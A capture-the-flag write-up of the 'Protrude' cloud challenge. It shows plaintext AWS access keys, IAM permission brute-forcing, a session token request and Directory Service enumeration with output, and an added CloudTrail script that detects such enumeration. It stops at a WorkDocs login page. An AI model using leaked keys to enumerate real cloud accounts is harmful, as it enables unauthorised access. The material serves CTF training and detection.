
Protrude

Challenge

  • CTF: HTB Business CTF 2024: The Vault of Hope
  • Name: Protrude
  • Category: Cloud
  • Difficulty: Easy
  • Points: 375
  • Description: We have obtained a leaked account pertaining to Vault 101, with suspicion that it may be linked to one of the leaders group. Your task is to enumerate and see if we can infiltrate them internally.

Writeup

Cloud Protrude

╰─❯ python3 enumerate-iam.py --access-key AKIAXYAFLIG2JE6MC2SY --secret-key teWVv0GzIBKS23uozxUGmUH+muE5XB86fnZmRZXu --region us-east-1
2024-05-18 14:56:38,694 - 277199 - [INFO] Starting permission enumeration for access-key-id "AKIAXYAFLIG2JE6MC2SY"
2024-05-18 14:56:39,018 - 277199 - [INFO] -- Account ARN : arn:aws:iam::532587168180:user/aalmodovar
2024-05-18 14:56:39,018 - 277199 - [INFO] -- Account Id  : 532587168180
2024-05-18 14:56:39,018 - 277199 - [INFO] -- Account Path: user/aalmodovar
2024-05-18 14:56:39,055 - 277199 - [INFO] Attempting common-service describe / list brute force.
^T2024-05-18 14:56:39,798 - 277199 - [INFO] -- dynamodb.describe_endpoints() worked!
2024-05-18 14:56:40,542 - 277199 - [ERROR] Remove globalaccelerator.describe_accelerator_attributes action
2024-05-18 14:56:40,822 - 277199 - [INFO] -- ds.describe_directories() worked!
2024-05-18 14:56:41,517 - 277199 - [INFO] -- sts.get_caller_identity() worked!
2024-05-18 14:56:42,209 - 277199 - [ERROR] Remove codedeploy.list_deployment_targets action
2024-05-18 14:56:42,249 - 277199 - [ERROR] Remove codedeploy.get_deployment_target action
2024-05-18 14:56:42,249 - 277199 - [ERROR] Remove codedeploy.batch_get_deployment_targets action
2024-05-18 14:56:42,491 - 277199 - [INFO] -- sts.get_session_token() worked!

aws sts get-session-token
Credentials:
  AccessKeyId: ASIAXYAFLIG2D3SN4IHV
  Expiration: '2024-05-19T07:14:10+00:00'
  SecretAccessKey: iAn+gnSO6ylAHZKb/Xe2qz+gwFDAjwVkKxsXzpqx
  SessionToken: <session token not preserved>

aws dynamodb describe-endpoints
Endpoints:
- Address: dynamodb.us-east-1.amazonaws.com
  CachePeriodInMinutes: 1440

aws ds describe-directories
DirectoryDescriptions:
- AccessUrl: vault101.awsapps.com
  Alias: vault101
  DesiredNumberOfDomainControllers: 0
  DirectoryId: d-9067e0513b
  DnsIpAddrs:
  - 172.31.87.164
  - 172.31.31.15
  LaunchTime: '2024-04-28T17:47:14.630000-04:00'
  Name: vault101.wasteland.local
  ShortName: VAULT101
  Size: Small
  SsoEnabled: true
  Stage: Active
  StageLastUpdatedDateTime: '2024-04-28T17:54:13.623000-04:00'
  Type: SimpleAD
  VpcSettings:
    AvailabilityZones:
    - us-east-1a
    - us-east-1d
    SecurityGroupId: sg-0bee7f241cef79345
    SubnetIds:
    - subnet-0a5022ff1dfdf5518
    - subnet-0574f58cd2d4f85ca
    VpcId: vpc-0d7b2c5c8509574bd

aws ds describe-directories --directory-ids d-9067e0513b
(output identical to the unfiltered describe-directories call above)

Try PACU:

docker run -it -v ~/.aws:/root/.aws rhinosecuritylabs/pacu:latest

AWS Directory Service (ds) is a web service that makes it easy for you to set up and run directories in the Amazon Web Services cloud, or connect your Amazon Web Services resources with an existing self-managed Microsoft Active Directory. This guide provides detailed information about Directory Service operations, data types, parameters, and errors. For information about Directory Services features, see Directory Service and the Directory Service Administration Guide.

Vault 101: https://vault101.awsapps.com/workdocs/loginv2/index.html#/emailSelect?sitename=vault101&check_auth_redirect=true

# Get directories and DCs
aws ds describe-directories
aws ds describe-domain-controllers --directory-id <id>
# Get directory settings
aws ds describe-trusts
aws ds describe-ldaps-settings --directory-id <id>
aws ds describe-shared-directories --owner-directory-id <id>
aws ds get-directory-limits
aws ds list-certificates --directory-id <id>
aws ds describe-certificate --directory-id <id> --certificate-id <id>
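
Seen from the account owner's side, the enumerate-iam brute force and the ds describe-* calls above appear in CloudTrail as one access key issuing read-only calls across many services in a few seconds, most of them denied. The Python below is an added example, not part of the original writeup: it flags that pattern and lists which calls actually succeeded. The thresholds, helper names, key IDs and sample records are assumptions constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

READ_PREFIXES = ("Describe", "List", "Get")
DENIED_MARKERS = ("AccessDenied", "UnauthorizedOperation")

def ts(record):
    return datetime.strptime(record["eventTime"], "%Y-%m-%dT%H:%M:%SZ")

def find_enumeration(records, window=timedelta(minutes=5), min_services=5, min_denied=0.5):
    """Flag access keys whose read-only calls fan out over many services, mostly denied."""
    by_key = defaultdict(list)
    for r in records:
        key = r.get("userIdentity", {}).get("accessKeyId")
        if key and r["eventName"].startswith(READ_PREFIXES):
            by_key[key].append(r)
    hits = {}
    for key, evs in by_key.items():
        evs.sort(key=ts)
        start = 0
        for end in range(len(evs)):  # sliding time window over this key's calls
            while ts(evs[end]) - ts(evs[start]) > window:
                start += 1
            burst = evs[start:end + 1]
            services = sorted({e["eventSource"] for e in burst})
            denied = sum(any(m in e.get("errorCode", "") for m in DENIED_MARKERS) for e in burst)
            if len(services) >= min_services and denied / len(burst) >= min_denied:
                # Records without errorCode succeeded: what the key can really reach.
                allowed = sorted(f'{e["eventSource"].split(".")[0]}:{e["eventName"]}'
                                 for e in burst if "errorCode" not in e)
                hits[key] = {"services": services, "calls": len(burst),
                             "denied": denied, "allowed": allowed}
    return hits

def ev(sec, service, name, key, error=None):  # builds one constructed record
    e = {"eventTime": f"2024-05-18T18:56:{sec}Z", "eventSource": f"{service}.amazonaws.com",
         "eventName": name, "userIdentity": {"accessKeyId": key}}
    if error:
        e["errorCode"] = error
    return e

LEAKED, APP = "AKIAEXAMPLELEAKED001", "AKIAEXAMPLEAPPKEY002"  # constructed key IDs
SAMPLE = [  # constructed CloudTrail-style records, not taken from the challenge
    ev("39", "sts", "GetCallerIdentity", LEAKED),
    ev("39", "ec2", "DescribeInstances", LEAKED, "Client.UnauthorizedOperation"),
    ev("40", "iam", "ListUsers", LEAKED, "AccessDenied"),
    ev("40", "ds", "DescribeDirectories", LEAKED),
    ev("41", "rds", "DescribeDBInstances", LEAKED, "AccessDenied"),
    ev("41", "s3", "ListBuckets", LEAKED, "AccessDenied"),
    ev("42", "sts", "GetSessionToken", LEAKED),
    ev("45", "s3", "ListBuckets", APP), ev("46", "s3", "GetBucketLocation", APP),
]
```

A trail configured to log write-only management events will not contain these Describe/List/Get calls, so the check needs read events enabled.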

Workdocs:

https://vault101.awsapps.com/login/?client_id=06f4bdef20da505e&redirect_uri=https%3A%2F%2Fvault101.awsapps.com%2Fworkdocs%2Floginv2%2Findex.html%23%2Fenterprisecallback

[email protected]